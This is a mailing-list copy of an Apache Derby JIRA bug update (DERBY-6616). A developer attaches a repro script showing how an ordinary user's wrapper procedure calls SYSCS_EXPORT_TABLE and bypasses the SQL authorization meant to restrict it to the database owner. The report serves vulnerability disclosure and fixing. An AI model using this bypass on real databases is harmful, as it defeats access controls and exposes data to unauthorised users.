You are viewing a plain text version of this content. The canonical link for it is here.

Posted to derby-dev@db.apache.org by "Rick Hillegas (JIRA)" <ji...@apache.org> on 2014/06/17 15:37:02 UTC

[jira] [Updated] (DERBY-6616) User procedures can call system procedures, circumventing SQL authorization.

     [ https://issues.apache.org/jira/browse/DERBY-6616?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Rick Hillegas updated DERBY-6616:
---------------------------------

    Attachment: SystemProcWrapper.java

Attaching SystemProcWrapper.java, which contains a procedure wrapping SYSCS_UTIL.SYSCS_EXPORT_TABLE. The following script shows how to use this procedure to circumvent SQL authorization checks on the system procedure:

{noformat}
connect 'jdbc:derby:memory:db1;create=true;user=test_dbo';

call syscs_util.syscs_create_user( 'TEST_DBO', 'test_dbopassword' );
call syscs_util.syscs_create_user( 'RUTH', 'ruthpassword' );

-- shutdown in order to enable NATIVE authentication
connect 'jdbc:derby:memory:db1;shutdown=true';

connect 'jdbc:derby:memory:db1;user=test_dbo;password=test_dbopassword' as dbo;

create table t( a int );
insert into t values ( 1 );

grant select on t to public;

connect 'jdbc:derby:memory:db1;user=ruth;password=ruthpassword' as ruth;

-- ruth can't execute this procedure directly
call syscs_util.syscs_export_table( 'TEST_DBO', 'T', 'z.dat', null, null, null );

create procedure wrapSYSCS_EXPORT_TABLE
(
    in schemaname  varchar(128),
    in tablename varchar(128),
    in filename varchar(32672),
    in columndelimiter char(1),
    in characterdelimiter char(1),
    in codeset varchar(128)
)
language java parameter style java reads sql data
external name 'SystemProcWrapper.wrapSYSCS_EXPORT_TABLE';

-- but she can execute this wrapper procedure
call wrapSYSCS_EXPORT_TABLE( 'TEST_DBO', 'T', 'z.dat', null, null, null );
{noformat}


> User procedures can call system procedures, circumventing SQL authorization.
> ----------------------------------------------------------------------------
>
>                 Key: DERBY-6616
>                 URL: https://issues.apache.org/jira/browse/DERBY-6616
>             Project: Derby
>          Issue Type: Bug
>          Components: SQL
>    Affects Versions: 10.11.0.0
>            Reporter: Rick Hillegas
>         Attachments: SystemProcWrapper.java
>
>
> System procedures are implemented as public static methods in org.apache.derby.catalog.SystemProcedures. These methods can be called by code in user-written procedures. This allows a user-written procedure to circumvent the SQL authorization checks which are supposed to limit some procedures to being called only by the DBO. I will attach a repro.



--
This message was sent by Atlassian JIRA
(v6.2#6252)